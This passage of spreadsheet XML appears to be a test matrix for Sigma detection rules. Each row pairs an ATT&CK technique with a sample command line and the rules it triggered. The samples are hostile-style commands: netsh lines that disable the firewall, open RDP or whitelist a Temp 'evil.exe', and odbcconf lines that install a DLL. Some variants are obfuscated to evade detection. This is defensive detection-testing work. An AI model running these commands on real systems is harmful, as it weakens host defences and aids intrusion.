          <t>Unmount Share Via Net.EXE (cb7c4a03-2871-43c0-9bbb-18bbdb079896); Unmount Share Via Net.EXE (cb7c4a03-2871-43c0-9bbb-18bbdb079896)</t>
        </is>
      </c>
      <c r="J4068" s="44" t="n"/>
      <c r="K4068" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4069" ht="15.75" customHeight="1" s="42">
      <c r="A4069" s="44" t="inlineStr">
        <is>
          <t>t1562.004</t>
        </is>
      </c>
      <c r="B4069" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_add_rule</t>
        </is>
      </c>
      <c r="C4069" s="44" t="inlineStr">
        <is>
          <t>New Firewall Rule Added Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D4069" s="44" t="inlineStr">
        <is>
          <t>cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c</t>
        </is>
      </c>
      <c r="E4069" s="44" t="inlineStr">
        <is>
          <t>netsh advfirewall firewall add rule name=Dropbox dir=in action=allow "program=C:\Program Files (x86)\Dropbox\Client\Dropbox.exe" enable=yes profile=Any</t>
        </is>
      </c>
      <c r="F4069" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4069" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4069" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4069" s="44" t="inlineStr">
        <is>
          <t>New Firewall Rule Added Via Netsh.EXE (cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c)</t>
        </is>
      </c>
      <c r="J4069" s="44" t="n"/>
      <c r="K4069" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4070" ht="15.75" customHeight="1" s="42">
      <c r="A4070" s="44" t="inlineStr">
        <is>
          <t>t1562.004</t>
        </is>
      </c>
      <c r="B4070" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_add_rule</t>
        </is>
      </c>
      <c r="C4070" s="44" t="inlineStr">
        <is>
          <t>New Firewall Rule Added Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D4070" s="44" t="inlineStr">
        <is>
          <t>cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c</t>
        </is>
      </c>
      <c r="E4070" s="44" t="inlineStr">
        <is>
          <t>netsh advfirewall firewall   add   rule name="TestRule" dir=in action=allow protocol=TCP localport=4489</t>
        </is>
      </c>
      <c r="F4070" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4070" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4070" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4070" s="44" t="inlineStr">
        <is>
          <t>New Firewall Rule Added Via Netsh.EXE (cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c)</t>
        </is>
      </c>
      <c r="J4070" s="44" t="n"/>
      <c r="K4070" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4071" ht="15.75" customHeight="1" s="42">
      <c r="A4071" s="44" t="inlineStr">
        <is>
          <t>t1562.004</t>
        </is>
      </c>
      <c r="B4071" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_allow_program_in_susp_location</t>
        </is>
      </c>
      <c r="C4071" s="44" t="inlineStr">
        <is>
          <t>Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D4071" s="44" t="inlineStr">
        <is>
          <t>a35f5a72-f347-4e36-8895-9869b0d5fc6d</t>
        </is>
      </c>
      <c r="E4071" s="44" t="inlineStr">
        <is>
          <t>netsh advfirewall firewall add rule name="Malware" dir=in action=allow program="C:\Windows\Temp\\evil.exe"</t>
        </is>
      </c>
      <c r="F4071" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4071" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4071" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4071" s="44" t="inlineStr">
        <is>
          <t>Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE (a35f5a72-f347-4e36-8895-9869b0d5fc6d); New Firewall Rule Added Via Netsh.EXE (cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c)</t>
        </is>
      </c>
      <c r="J4071" s="44" t="n"/>
      <c r="K4071" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4072" ht="15.75" customHeight="1" s="42">
      <c r="A4072" s="44" t="inlineStr">
        <is>
          <t>t1562.004</t>
        </is>
      </c>
      <c r="B4072" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_allow_program_in_susp_location</t>
        </is>
      </c>
      <c r="C4072" s="44" t="inlineStr">
        <is>
          <t>Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D4072" s="44" t="inlineStr">
        <is>
          <t>a35f5a72-f347-4e36-8895-9869b0d5fc6d</t>
        </is>
      </c>
      <c r="E4072" s="44" t="inlineStr">
        <is>
          <t>netsh advfirewall firewall add rule name="Malware" dir=in action=allow program="C:/Windows/Temp/evil.exe"</t>
        </is>
      </c>
      <c r="F4072" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4072" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4072" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4072" s="44" t="inlineStr">
        <is>
          <t>New Firewall Rule Added Via Netsh.EXE (cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c)</t>
        </is>
      </c>
      <c r="J4072" s="44" t="n"/>
      <c r="K4072" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4073" ht="15.75" customHeight="1" s="42">
      <c r="A4073" s="44" t="inlineStr">
        <is>
          <t>t1562.004</t>
        </is>
      </c>
      <c r="B4073" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_allow_program_in_susp_location</t>
        </is>
      </c>
      <c r="C4073" s="44" t="inlineStr">
        <is>
          <t>Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D4073" s="44" t="inlineStr">
        <is>
          <t>a35f5a72-f347-4e36-8895-9869b0d5fc6d</t>
        </is>
      </c>
      <c r="E4073" s="44" t="inlineStr">
        <is>
          <t>netsh advfirewall firewall add rule name="Malware" dir=in action=allow program="..\..\Windows\Temp\evil.exe"</t>
        </is>
      </c>
      <c r="F4073" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4073" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4073" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4073" s="44" t="inlineStr">
        <is>
          <t>New Firewall Rule Added Via Netsh.EXE (cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c); Potential Command Line Path Traversal Evasion Attempt (1327381e-6ab0-4f38-b583-4c1b8346a56b); Potential Command Line Path Traversal Evasion Attempt (1327381e-6ab0-4f38-b583-4c1b8346a56b)</t>
        </is>
      </c>
      <c r="J4073" s="44" t="n"/>
      <c r="K4073" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4074" ht="15.75" customHeight="1" s="42">
      <c r="A4074" s="44" t="inlineStr">
        <is>
          <t>t1562.004</t>
        </is>
      </c>
      <c r="B4074" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_allow_program_in_susp_location</t>
        </is>
      </c>
      <c r="C4074" s="44" t="inlineStr">
        <is>
          <t>Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D4074" s="44" t="inlineStr">
        <is>
          <t>a35f5a72-f347-4e36-8895-9869b0d5fc6d</t>
        </is>
      </c>
      <c r="E4074" s="44" t="inlineStr">
        <is>
          <t>netsh advfirewall "firewall" "add" "rule" "action=allow" "program=C:\Windows\Temp\evil.exe"</t>
        </is>
      </c>
      <c r="F4074" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4074" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4074" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4074" s="44" t="inlineStr">
        <is>
          <t>Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE (a35f5a72-f347-4e36-8895-9869b0d5fc6d)</t>
        </is>
      </c>
      <c r="J4074" s="44" t="n"/>
      <c r="K4074" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4075" ht="15.75" customHeight="1" s="42">
      <c r="A4075" s="44" t="inlineStr">
        <is>
          <t>t1562.004</t>
        </is>
      </c>
      <c r="B4075" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_allow_rdp</t>
        </is>
      </c>
      <c r="C4075" s="44" t="inlineStr">
        <is>
          <t>RDP Connection Allowed Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D4075" s="44" t="inlineStr">
        <is>
          <t>01aeb693-138d-49d2-9403-c4f52d7d3d62</t>
        </is>
      </c>
      <c r="E4075" s="44" t="inlineStr">
        <is>
          <t>netsh advfirewall firewall add rule name="AllowRDP" dir=in action=allow localport=3389 protocol=tcp</t>
        </is>
      </c>
      <c r="F4075" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4075" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4075" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4075" s="44" t="inlineStr">
        <is>
          <t>New Firewall Rule Added Via Netsh.EXE (cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c)</t>
        </is>
      </c>
      <c r="J4075" s="44" t="n"/>
      <c r="K4075" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4076" ht="15.75" customHeight="1" s="42">
      <c r="A4076" s="44" t="inlineStr">
        <is>
          <t>t1562.004</t>
        </is>
      </c>
      <c r="B4076" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_allow_rdp</t>
        </is>
      </c>
      <c r="C4076" s="44" t="inlineStr">
        <is>
          <t>RDP Connection Allowed Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D4076" s="44" t="inlineStr">
        <is>
          <t>01aeb693-138d-49d2-9403-c4f52d7d3d62</t>
        </is>
      </c>
      <c r="E4076" s="44" t="inlineStr">
        <is>
          <t>netsh advfirewall firewall add rule name="AllowRDP" dir=in action=allow protocol=tcp localport=0x0D3D</t>
        </is>
      </c>
      <c r="F4076" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4076" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4076" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4076" s="44" t="inlineStr">
        <is>
          <t>New Firewall Rule Added Via Netsh.EXE (cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c)</t>
        </is>
      </c>
      <c r="J4076" s="44" t="n"/>
      <c r="K4076" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4077" ht="15.75" customHeight="1" s="42">
      <c r="A4077" s="44" t="inlineStr">
        <is>
          <t>t1562.004</t>
        </is>
      </c>
      <c r="B4077" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_delete_rule</t>
        </is>
      </c>
      <c r="C4077" s="44" t="inlineStr">
        <is>
          <t>Firewall Rule Deleted Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D4077" s="44" t="inlineStr">
        <is>
          <t>1a5fefe6-734f-452e-a07d-fc1c35bce4b2</t>
        </is>
      </c>
      <c r="E4077" s="44" t="inlineStr">
        <is>
          <t>netsh advfirewall firewall delete   rule name="TestRule"</t>
        </is>
      </c>
      <c r="F4077" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4077" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4077" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4077" s="44" t="inlineStr">
        <is>
          <t>Firewall Rule Deleted Via Netsh.EXE (1a5fefe6-734f-452e-a07d-fc1c35bce4b2)</t>
        </is>
      </c>
      <c r="J4077" s="44" t="n"/>
      <c r="K4077" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4078" ht="15.75" customHeight="1" s="42">
      <c r="A4078" s="44" t="inlineStr">
        <is>
          <t>t1562.004</t>
        </is>
      </c>
      <c r="B4078" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_delete_rule</t>
        </is>
      </c>
      <c r="C4078" s="44" t="inlineStr">
        <is>
          <t>Firewall Rule Deleted Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D4078" s="44" t="inlineStr">
        <is>
          <t>1a5fefe6-734f-452e-a07d-fc1c35bce4b2</t>
        </is>
      </c>
      <c r="E4078" s="44" t="inlineStr">
        <is>
          <t>netsh advfirewall firewall delete rule name=Dropbox</t>
        </is>
      </c>
      <c r="F4078" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4078" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4078" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4078" s="44" t="inlineStr">
        <is>
          <t>Firewall Rule Deleted Via Netsh.EXE (1a5fefe6-734f-452e-a07d-fc1c35bce4b2)</t>
        </is>
      </c>
      <c r="J4078" s="44" t="n"/>
      <c r="K4078" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4079" ht="15.75" customHeight="1" s="42">
      <c r="A4079" s="44" t="inlineStr">
        <is>
          <t>t1562.004</t>
        </is>
      </c>
      <c r="B4079" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_disable</t>
        </is>
      </c>
      <c r="C4079" s="44" t="inlineStr">
        <is>
          <t>Firewall Disabled via Netsh.EXE</t>
        </is>
      </c>
      <c r="D4079" s="44" t="inlineStr">
        <is>
          <t>57c4bf16-227f-4394-8ec7-1b745ee061c3</t>
        </is>
      </c>
      <c r="E4079" s="44" t="inlineStr">
        <is>
          <t>netsh advfirewall "set" "currentprofile" "state" "off"</t>
        </is>
      </c>
      <c r="F4079" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4079" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4079" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4079" s="44" t="inlineStr">
        <is>
          <t>Firewall Disabled via Netsh.EXE (57c4bf16-227f-4394-8ec7-1b745ee061c3)</t>
        </is>
      </c>
      <c r="J4079" s="44" t="n"/>
      <c r="K4079" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4080" ht="15.75" customHeight="1" s="42">
      <c r="A4080" s="44" t="inlineStr">
        <is>
          <t>t1562.004</t>
        </is>
      </c>
      <c r="B4080" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_disable</t>
        </is>
      </c>
      <c r="C4080" s="44" t="inlineStr">
        <is>
          <t>Firewall Disabled via Netsh.EXE</t>
        </is>
      </c>
      <c r="D4080" s="44" t="inlineStr">
        <is>
          <t>57c4bf16-227f-4394-8ec7-1b745ee061c3</t>
        </is>
      </c>
      <c r="E4080" s="44" t="inlineStr">
        <is>
          <t>netsh advfirewall set currentprofile state off</t>
        </is>
      </c>
      <c r="F4080" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4080" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4080" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4080" s="44" t="inlineStr">
        <is>
          <t>Firewall Disabled via Netsh.EXE (57c4bf16-227f-4394-8ec7-1b745ee061c3)</t>
        </is>
      </c>
      <c r="J4080" s="44" t="n"/>
      <c r="K4080" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4081" ht="15.75" customHeight="1" s="42">
      <c r="A4081" s="44" t="inlineStr">
        <is>
          <t>t1562.004</t>
        </is>
      </c>
      <c r="B4081" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_disable</t>
        </is>
      </c>
      <c r="C4081" s="44" t="inlineStr">
        <is>
          <t>Firewall Disabled via Netsh.EXE</t>
        </is>
      </c>
      <c r="D4081" s="44" t="inlineStr">
        <is>
          <t>57c4bf16-227f-4394-8ec7-1b745ee061c3</t>
        </is>
      </c>
      <c r="E4081" s="44" t="inlineStr">
        <is>
          <t>netsh advfirewall set privateprofile state off</t>
        </is>
      </c>
      <c r="F4081" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4081" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4081" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4081" s="44" t="inlineStr">
        <is>
          <t>Firewall Disabled via Netsh.EXE (57c4bf16-227f-4394-8ec7-1b745ee061c3)</t>
        </is>
      </c>
      <c r="J4081" s="44" t="n"/>
      <c r="K4081" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4082" ht="15.75" customHeight="1" s="42">
      <c r="A4082" s="44" t="inlineStr">
        <is>
          <t>t1562.004</t>
        </is>
      </c>
      <c r="B4082" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_enable_group_rule</t>
        </is>
      </c>
      <c r="C4082" s="44" t="inlineStr">
        <is>
          <t>Netsh Allow Group Policy on Microsoft Defender Firewall</t>
        </is>
      </c>
      <c r="D4082" s="44" t="inlineStr">
        <is>
          <t>347906f3-e207-4d18-ae5b-a9403d6bcdef</t>
        </is>
      </c>
      <c r="E4082" s="44" t="inlineStr">
        <is>
          <t>netsh advfirewall firewall set rule group="remote desktop" new enable=yes</t>
        </is>
      </c>
      <c r="F4082" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4082" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4082" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4082" s="44" t="inlineStr">
        <is>
          <t>Netsh Allow Group Policy on Microsoft Defender Firewall (347906f3-e207-4d18-ae5b-a9403d6bcdef); Firewall Rule Update Via Netsh.EXE (a70dcb37-3bee-453a-99df-d0c683151be6)</t>
        </is>
      </c>
      <c r="J4082" s="44" t="n"/>
      <c r="K4082" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4083" ht="15.75" customHeight="1" s="42">
      <c r="A4083" s="44" t="inlineStr">
        <is>
          <t>t1562.004</t>
        </is>
      </c>
      <c r="B4083" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_enable_group_rule</t>
        </is>
      </c>
      <c r="C4083" s="44" t="inlineStr">
        <is>
          <t>Netsh Allow Group Policy on Microsoft Defender Firewall</t>
        </is>
      </c>
      <c r="D4083" s="44" t="inlineStr">
        <is>
          <t>347906f3-e207-4d18-ae5b-a9403d6bcdef</t>
        </is>
      </c>
      <c r="E4083" s="44" t="inlineStr">
        <is>
          <t>netsh "advfirewall" "firewall" "set" "rule" "group=remote desktop" "new" "enable=Yes"</t>
        </is>
      </c>
      <c r="F4083" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4083" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4083" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4083" s="44" t="inlineStr">
        <is>
          <t>Netsh Allow Group Policy on Microsoft Defender Firewall (347906f3-e207-4d18-ae5b-a9403d6bcdef)</t>
        </is>
      </c>
      <c r="J4083" s="44" t="n"/>
      <c r="K4083" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4084" ht="15.75" customHeight="1" s="42">
      <c r="A4084" s="44" t="inlineStr">
        <is>
          <t>t1562.004</t>
        </is>
      </c>
      <c r="B4084" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_enable_group_rule</t>
        </is>
      </c>
      <c r="C4084" s="44" t="inlineStr">
        <is>
          <t>Netsh Allow Group Policy on Microsoft Defender Firewall</t>
        </is>
      </c>
      <c r="D4084" s="44" t="inlineStr">
        <is>
          <t>347906f3-e207-4d18-ae5b-a9403d6bcdef</t>
        </is>
      </c>
      <c r="E4084" s="44" t="inlineStr">
        <is>
          <t>netsh advfirewall firewall set rule group= remote desktop new enable=Yes</t>
        </is>
      </c>
      <c r="F4084" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4084" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4084" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4084" s="44" t="inlineStr">
        <is>
          <t>Netsh Allow Group Policy on Microsoft Defender Firewall (347906f3-e207-4d18-ae5b-a9403d6bcdef); Firewall Rule Update Via Netsh.EXE (a70dcb37-3bee-453a-99df-d0c683151be6)</t>
        </is>
      </c>
      <c r="J4084" s="44" t="n"/>
      <c r="K4084" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4085" ht="15.75" customHeight="1" s="42">
      <c r="A4085" s="44" t="inlineStr">
        <is>
          <t>t1562.004</t>
        </is>
      </c>
      <c r="B4085" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_enable_group_rule</t>
        </is>
      </c>
      <c r="C4085" s="44" t="inlineStr">
        <is>
          <t>Netsh Allow Group Policy on Microsoft Defender Firewall</t>
        </is>
      </c>
      <c r="D4085" s="44" t="inlineStr">
        <is>
          <t>347906f3-e207-4d18-ae5b-a9403d6bcdef</t>
        </is>
      </c>
      <c r="E4085" s="44" t="inlineStr">
        <is>
          <t>netsh advfirewall firewall set rule new enable=Yes group="remote desktop"</t>
        </is>
      </c>
      <c r="F4085" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4085" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4085" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4085" s="44" t="inlineStr">
        <is>
          <t>Netsh Allow Group Policy on Microsoft Defender Firewall (347906f3-e207-4d18-ae5b-a9403d6bcdef); Firewall Rule Update Via Netsh.EXE (a70dcb37-3bee-453a-99df-d0c683151be6)</t>
        </is>
      </c>
      <c r="J4085" s="44" t="n"/>
      <c r="K4085" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4086" ht="15.75" customHeight="1" s="42">
      <c r="A4086" s="44" t="inlineStr">
        <is>
          <t>t1218.008</t>
        </is>
      </c>
      <c r="B4086" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_odbcconf_driver_install</t>
        </is>
      </c>
      <c r="C4086" s="44" t="inlineStr">
        <is>
          <t>Driver/DLL Installation Via Odbcconf.EXE</t>
        </is>
      </c>
      <c r="D4086" s="44" t="inlineStr">
        <is>
          <t>3f5491e2-8db8-496b-9e95-1029fce852d4</t>
        </is>
      </c>
      <c r="E4086" s="44" t="inlineStr">
        <is>
          <t>odbcconf.exe /A {INSTALLDRIVER "MyDriver|C:\Temp\test.dll"}</t>
        </is>
      </c>
      <c r="F4086" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4086" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4086" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4086" s="44" t="inlineStr">
        <is>
          <t>Odbcconf.EXE Suspicious DLL Location (6b65c28e-11f3-46cb-902a-68f2cafaf474); Driver/DLL Installation Via Odbcconf.EXE (3f5491e2-8db8-496b-9e95-1029fce852d4)</t>
        </is>
      </c>
      <c r="J4086" s="44" t="n"/>
      <c r="K4086" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4087" ht="15.75" customHeight="1" s="42">
      <c r="A4087" s="44" t="inlineStr">
        <is>
          <t>t1218.008</t>
        </is>
      </c>
      <c r="B4087" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_odbcconf_driver_install</t>
        </is>
      </c>
      <c r="C4087" s="44" t="inlineStr">
        <is>
          <t>Driver/DLL Installation Via Odbcconf.EXE</t>
        </is>
      </c>
      <c r="D4087" s="44" t="inlineStr">
        <is>
          <t>3f5491e2-8db8-496b-9e95-1029fce852d4</t>
        </is>
      </c>
      <c r="E4087" s="44" t="inlineStr">
        <is>
          <t>odbcconf.exe /A {INSTALLDRIVER	"MyDriver|C:\Temp\test.dll"}</t>
        </is>
      </c>
      <c r="F4087" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4087" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4087" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4087" s="44" t="inlineStr">
        <is>
          <t>Odbcconf.EXE Suspicious DLL Location (6b65c28e-11f3-46cb-902a-68f2cafaf474)</t>
        </is>
      </c>
      <c r="J4087" s="44" t="n"/>
      <c r="K4087" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4088" ht="15.75" customHeight="1" s="42">
      <c r="A4088" s="44" t="inlineStr">
        <is>
          <t>t1218.008</t>
        </is>
      </c>
      <c r="B4088" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_odbcconf_driver_install</t>
        </is>
      </c>
      <c r="C4088" s="44" t="inlineStr">
        <is>
          <t>Driver/DLL Installation Via Odbcconf.EXE</t>
        </is>
      </c>
      <c r="D4088" s="44" t="inlineStr">
        <is>
          <t>3f5491e2-8db8-496b-9e95-1029fce852d4</t>
        </is>
      </c>
      <c r="E4088" s="44" t="inlineStr">
        <is>
          <t>odbcconf.exe /A {"INSTALLDRIVER" "MyDriver|C:\Temp\test.dll"}</t>
        </is>
      </c>
      <c r="F4088" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4088" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4088" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4088" s="44" t="inlineStr">
        <is>
          <t>Odbcconf.EXE Suspicious DLL Location (6b65c28e-11f3-46cb-902a-68f2cafaf474)</t>
        </is>
      </c>
      <c r="J4088" s="44" t="n"/>
      <c r="K4088" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4089" ht="15.75" customHeight="1" s="42">
      <c r="A4089" s="44" t="inlineStr">
        <is>
          <t>t1218.008</t>
        </is>
      </c>
      <c r="B4089" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_odbcconf_driver_install</t>
        </is>
      </c>
      <c r="C4089" s="44" t="inlineStr">
        <is>
          <t>Driver/DLL Installation Via Odbcconf.EXE</t>
        </is>
      </c>
      <c r="D4089" s="44" t="inlineStr">
        <is>
          <t>3f5491e2-8db8-496b-9e95-1029fce852d4</t>
        </is>
      </c>
      <c r="E4089" s="44" t="inlineStr">
        <is>
          <t>odbcconf.exe /A {INSTALLDRIVER "MyDriver|C:\Temp\test.dll "}</t>
        </is>
      </c>
      <c r="F4089" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4089" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4089" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4089" s="44" t="inlineStr">
        <is>
          <t>Odbcconf.EXE Suspicious DLL Location (6b65c28e-11f3-46cb-902a-68f2cafaf474); Driver/DLL Installation Via Odbcconf.EXE (3f5491e2-8db8-496b-9e95-1029fce852d4)</t>
        </is>
      </c>
      <c r="J4089" s="44" t="n"/>
      <c r="K4089" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4090" ht="15.75" customHeight="1" s="42">
      <c r="A4090" s="44" t="inlineStr">
        <is>
          <t>t1218.008</t>
        </is>
      </c>
      <c r="B4090" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_odbcconf_driver_install</t>
        </is>
      </c>
      <c r="C4090" s="44" t="inlineStr">
        <is>
          <t>Driver/DLL Installation Via Odbcconf.EXE</t>
        </is>
      </c>
      <c r="D4090" s="44" t="inlineStr">
        <is>
          <t>3f5491e2-8db8-496b-9e95-1029fce852d4</t>
        </is>
      </c>
      <c r="E4090" s="44" t="inlineStr">
        <is>
          <t>odbcconf.exe /F C:\Temp\response_file.rsp</t>
        </is>
      </c>
      <c r="F4090" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4090" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4090" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4090" s="44" t="inlineStr">
        <is>
          <t>Odbcconf.EXE Suspicious DLL Location (6b65c28e-11f3-46cb-902a-68f2cafaf474); Response File Execution Via Odbcconf.EXE (5f03babb-12db-4eec-8c82-7b4cb5580868)</t>
        </is>
      </c>
      <c r="J4090" s="44" t="n"/>
      <c r="K4090" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4091" ht="15.75" customHeight="1" s="42">
      <c r="A4091" s="44" t="inlineStr">
        <is>
          <t>t1218.008</t>
        </is>
      </c>
      <c r="B4091" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_odbcconf_driver_install_susp</t>
        </is>
      </c>
      <c r="C4091" s="44" t="inlineStr">
        <is>
          <t>Suspicious Driver/DLL Installation Via Odbcconf.EXE</t>
        </is>
      </c>
      <c r="D4091" s="44" t="inlineStr">
        <is>
          <t>cb0fe7c5-f3a3-484d-aa25-d350a7912729</t>
        </is>
      </c>
      <c r="E4091" s="44" t="inlineStr">
        <is>
          <t>odbcconf.exe /A {INSTALLDRIVER "MyDriver|C:\Temp\test.dat"} .dll</t>
        </is>
      </c>
      <c r="F4091" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4091" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4091" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4091" s="44" t="inlineStr">
        <is>
          <t>Odbcconf.EXE Suspicious DLL Location (6b65c28e-11f3-46cb-902a-68f2cafaf474); Driver/DLL Installation Via Odbcconf.EXE (3f5491e2-8db8-496b-9e95-1029fce852d4)</t>
        </is>
      </c>
      <c r="J4091" s="44" t="n"/>
      <c r="K4091" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4092" ht="15.75" customHeight="1" s="42">
      <c r="A4092" s="44" t="inlineStr">
        <is>
          <t>t1218.008</t>
        </is>
      </c>
      <c r="B4092" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_odbcconf_driver_install_susp</t>
        </is>
      </c>
      <c r="C4092" s="44" t="inlineStr">
        <is>
          <t>Suspicious Driver/DLL Installation Via Odbcconf.EXE</t>
        </is>
      </c>
      <c r="D4092" s="44" t="inlineStr">
        <is>
